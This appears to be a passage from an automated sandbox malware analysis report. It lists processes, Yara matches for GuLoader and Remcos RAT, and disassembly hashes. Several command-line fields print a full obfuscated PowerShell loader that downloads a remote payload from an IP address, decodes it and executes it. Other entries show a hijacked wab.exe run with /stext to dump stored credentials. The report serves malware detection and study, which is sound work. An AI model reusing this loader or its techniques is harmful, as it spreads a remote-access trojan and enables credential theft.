Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. ');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;"
                    Imagebase:0x7ff741d30000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:01:50:03
                    Start date:02/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:01:50:04
                    Start date:02/07/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                    Imagebase:0x7ff74bb30000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:14
                    Start time:01:50:12
                    Start date:02/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivariidPrimasse,ruitbesStetikkiHjemstatSnaph neSkrukh.)Meretr. ');Sarcophilus (Brassart ' abong$UtmmeligDragelsl stak,eo hoirwib WartleaBffengolBasebal:Fejl,asBParodiel SkyldsoCopo,ymo PensiodDdlkkerr Lavesto HalvenoTvangsftAde,omo= Ue enn$DrblernSArbejdsk UanselrBalle.eb ForvrieKulle slover.ari Skinang Fuldbat Babasc1.roathl5Spoonb,7 Antidr.BloodtesAfske.spOvercomlBidragsiCrot.nttT,ansve( Ordnyo$ingenirC Snert,oBarnedan Pred.bsUgrssetc recoloiB.rdolpo,xtermin FaradiaAfdelinbRygelselUhaandteCestoshnGlobalseBeneficsAssu.ersTeddip )Nonrege ');Sarcophilus (Brassart 'Elvrks,[MarkedsNMerisise talerstLeasing.SonshipSAvertere Forsder,anidiavCrewmemi TopnglcKonomsaeTr.vlemPRe,ervioInternai nonsabnOpercultddstegnM SeborramumbudgnInfusioaArchiepgUnderdeeOplysnir Bu.lhe]Strolls: Fal.ib: parinS BootsteVimineocStanduruRiantagrBeg.deliBaudrattTipier yParticuPUdearberPhenylao Non.irt Fedtsmo untrifcShamecaoTrf,erel Styreh Crystal=Stroppi Specif [.ilodenNHelaafke MnterntBrednin.NonpathS Pa.ticeCollinscboganm uBedsp.or,rndeviiInkassotBanesaay irreduP toptyvrBygge ao HighlatShog.unoD.theryc kammenoBadel.glNdvendiTOpdatery MglingpbrachiaeEl.ctro] Orange:Scaletl:CrowdedTOps.revlPapirstsVenomos1Forvund2Mandril ');$Skrbeligt157=$Bloodroot[0];$Afguder= (Brassart 'Krohold$ EloinigholocenlGaveafgoEctomerb TerritaRenunculContain: AflvniH Emanc,iKeyma lgTillaegh ValidebR usenuaMeta,ralunbundll linguisKamera,=EfterliNOutsavoe ombazw Synneu-gedebolOTopcoatbfrsteopjvar.edneEkstempc KlemtvtCheekpi vindic SZizyphuyTimonias krydsmtAn tomie Raffl,mUnderbe. maskinNDep,ecieYvindsptMon.oli.KvilibrWDakoitieLyrer,ebNonfixaCClinkstlDemimoniBriseiserationenTilstedt');$Afguder+=$Inexertion[1];Sarcophilus ($Afguder);Sarcophilus (Brassart ' Stngen$.efektiH olphiniChristigH.farveh AfbenybExtrasea StosnilUnderbulBasnglesVrdia,g.EncreasHAppropieEft,rbeaSuggestdFi palueHypermer,askekus Skr.ld[ hroni$Sta.usoCAnkelsoaHandelsp kanderkHuovertiOrientenUdvikli] Benzoa=Moyleu,$Sund,edDAsthorieT.unkfil Azollae P,rtystNoce ceiUn,ervivTachygeeSlipove ');$breplansbaad=Brassart 'inholdi$HalopsyHStellari BibliogKi skejh Longhebcylindra erohylMbel,ablNiveau.sPlane,a.BlthaveDJagtgstoPseudoswthe mogn CavlinlTintefeoDingenoaRykkerbdReperc,F .yngdeiLgehuselUnsupere ,amliv( El.ond$Stirre,SRe,tartkKi,dredrSlukninb West.aeShielddlShoecrai KonfiggFyringstHandels1 Perthi5Sar,ens7 Sniffi, Sympat$MassesuS OmlasttBo,anopaRelendinEnrheumdTran,itaMindsterBevgeapdInf,atiiKokosndsPokinglaContaint LooingiDelegatoTetanolnHomotrasu smidn) Dipt r ';$Standardisations=$Inexertion[0];Sarcophilus (Brassart 'Undece.$CotraitgvippedelUnderpuoRejoicibFrilanda S,ekodlNontran:Voluntes Ko.plet ElvesqaBlomst v Wh,tsolPaedophyNrmertrgTrkproctFrak,ioeAkselafrh,tzerssRepract=jespejl(tipbartT S.rtkueStandars,narchitFagacea- colandP Delsteasalvad tGl,nsnuh Norman Vrksted$Margi sSBaginditGolftrjaSuprasqnHema oxdCanthutaTsesantr NoncomdEibrittiParodics SemestaAchaemet CriminiDisgraco Thre,tnAggregasErg,ter)tempori ');while (!$stavlygters) {Sarcophilus (Brassart ' Sonsie$Konservg Crocial BostnioOffervibFloragraskriveml Lum.er:EksisteH S,ikkev Un.erbn,ireraue DeposarBogma,k=Snapsfl$PreaccutImp nitrAcetylsuArticuleAbsorbe ') ;Sarcophilus $breplansbaad;Sarcophilus (Brassart 'Rgerli,SSm thertChalqueaEctocunrD.pravetrebroac-Ungt liSYver,idlGttevrke Aktualegen ralpOverfla F.brika4Vegetat ');Sarcophilus (Brassart 'Tchapan$PlovskrgAircondlGangninoGi termbOvervinaRigsarklVaabenm:,ansslus ProgratOpgrelsaSethprdv TrolovlKonsuley Me.tingDenyerat Forep eAu ocarrreinvessSpaltet=Transce(G,rhamiT mbelfae Meste sAntimettCasca,o- SpritbP Banesaagruntsct Omsalgh Halvku m.narc$MarchpaSWiederhtFeuderva PolyphnReballodO,eratiaUnderskrCrammeldMenneskiraflendsFjendtla NongymtRandomniFremmedoTilintenBaculess,ychosi)Afkor.e ') ;Sarcophilus (Brassart 'Songsm $ TurritgAnti,rol upmanwo KravlebIsomalta Hamatal Omd ni:ReticulICounternVebogenfHyperdioSaltingrBlawingm Avle.ya ntervotAfgoerei DumpedcResurseaCoalise2 Ancres0 Diffra0Borityj=Reassur$Soranskg,uckhoulMauricioTuftsblbOutrhymaGazettel Standa:InterioB tolerarPatriotiTostadol .semafl SorehoiNear,rdager.temnAreopagcdiaxiali FetisheStitchwsVeinle,+ Havned+Teg,ede%Stenoty$OpraabtBIngui olSmutturoVeludvio Ebbiskd trfferrMacera,oAnisoptoFonetiktIns,rin.PlateaucDecimaloAdu ticuSurinamnOwnabletRaklebr ') ;$Skrbeligt157=$Bloodroot[$Informatica200];}$Kontekstfri=314175;$Untastefulness=30570;Sarcophilus (Brassart 'Outpush$ ReopergFolketilVerfendo Hyacinbno.answaAcrimonlsailo.i:AromatiFCaciqueoInterner Gyptolb FljeneyWithanitAulaegutC ukkere.sonnrrrSaltvan breamun=Ste,mep InclusGDisordeeCirkulatno voli-AfglatcCStan.aroI,ereskn Morf.rtAsker,geCumaruonsulta.etF.imure Sydsles$MicroanSAnteprotEnklesta SwartynS ecifid H.pertaHovedkarIlddaabdCotyla,iSeromans SysletaBalsamitExosmosiMarlingo.kjtebanPanteresUnchari ');Sarcophilus (Brassart 'Udekamp$ monon gF,emkallSulfoneokolibakbvidnefraSystemsl Scilli:L,censuRSpe.dere UnencunN crotogSnirkleu liniese .ecert Castrat=Fgte,ne Unsupp[ Ghe toS StudieyCinderis.rotosaton.matoeUfoenanmStnknin. SwizzlC Thayneo,uillain AffektvWuggisheFedestirDkslastt Sorc r]grundpr: Stim.l:AdventuF.ragmenrPr tovuoSk.oldlm.rukkenBervilseaHypoptesTubercueAfounde6Paspalu4BlddeleSTrach,mt Abla,irAmphoroiOvers,rnRegnemsg Hnenth(.anseor$ .ystmoFAstronooF emskrrGothshjbcombustyAccentetInhumertSkema,ieWallabyrEntea,l).inigol ');Sarcophilus (Brassart 'Inte va$Uneatingti etallNonextioAntispibFingersaSkj.ebalOpsigel:A teriicsgernebo Ut lism.anktbem Forkv.eAssertrrGrundbgc Supe diPikkenda Radi.blThorvaliTerrorizUnl gisiProjektnGenskabgKomedie Wyliesk=Buelamp Panikke[Unc mprSBartendyDiabetes LangtitnonexuleGa,erskmBaar.rf. AviatoT UnjoureTarsioix FlawfltAl ergi.UnfrangEPlisseenLysreklcKilendeoA tenuad dtungeiHar anhnMinbugsg pixpap]S,iklag:Obconic:Misi teAHeksen.SCounterC.tjlernIStarkypIPaalgsc.ModigstGBart nde Pallout M,nunaSReplik,tvggenstrSabbatii StruggnUdstykkgRagtim.(bladder$.elefonR,rthogreItineranAfdoedtgRemateduRadioakeMisfeat)Datauhe ');Sarcophilus (Brassart 'Bailage$Scler.sgBes vdol nidudioKanutudb eripeaSintri.lCa,ital:Daane oUUdlbstinMateriacP otoplrSalatoly ramatusSynchrotSangu ma capryllApastrolSti,hediKo,eplazPoloskjaTil ntebGoodwiliServi pl enecoliTypehustAffaldsiGavottieA,tomatsSpandre=Tilstrm$ Fejlrec,omputeoMis.etrmInva idmTaflerte For lirLderpuncUl.iereiArgumenaActinull SculleiGr.bworzEspad iiBrugstyn Boble gTrammel. Digamms Ge,tatu hamfebReglemesLer aretAmar,nerSchoo.siFysiurgnFladbl,gHerskab(En.erso$La.aniaKFngselsoSnderlenBilineatU,blusheUnpitiek S,reflsHeikesltHera lefTillbe.rS,elteriEpiphys,Morbro $ ActinoUDotlikenIngravet Skrivea SubmersMystifitTraitoreLetterifTenen.uu lleapplNonrespn Mismo eDemeritsPersonasarsenic)Rhinsku ');Sarcophilus $Uncrystallizabilities;"
                    Imagebase:0xc10000
                    File size:433'152 bytes
                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.1727059954.000000000BAFD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:15
                    Start time:01:50:13
                    Start date:02/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                    Imagebase:0x410000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:17
                    Start time:03:36:42
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:20
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:21
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:22
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:23
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:24
                    Start time:03:37:03
                    Start date:02/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
                    Imagebase:0x10000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Executed Functions

                      Function 00007FFAACCBB0F6 Relevance: .5, Instructions: 476COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2008530488.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaaccb0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2607979941b7db1a061106c28d38806641fe4cdd77ff55a09b3a243d90707c25
                      • Instruction ID: fd808f6b34f5dcd44d1331476da08939d40548daa3ed363eb572b6699ab244b8
                      • Opcode Fuzzy Hash: 2607979941b7db1a061106c28d38806641fe4cdd77ff55a09b3a243d90707c25
                      • Instruction Fuzzy Hash: 0BF1A570908A4E8FEBA8DF68C8557E977E1FF55310F04826AE84DC7692CF34D9458B82
                      Function 00007FFAACCBBEA2 Relevance: .5, Instructions: 461COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000002.00000002.2008530488.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7ffaaccb0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5ba597f22e76edfacc48af08f65d083545ffdd50f306968413e5446397eacbfb
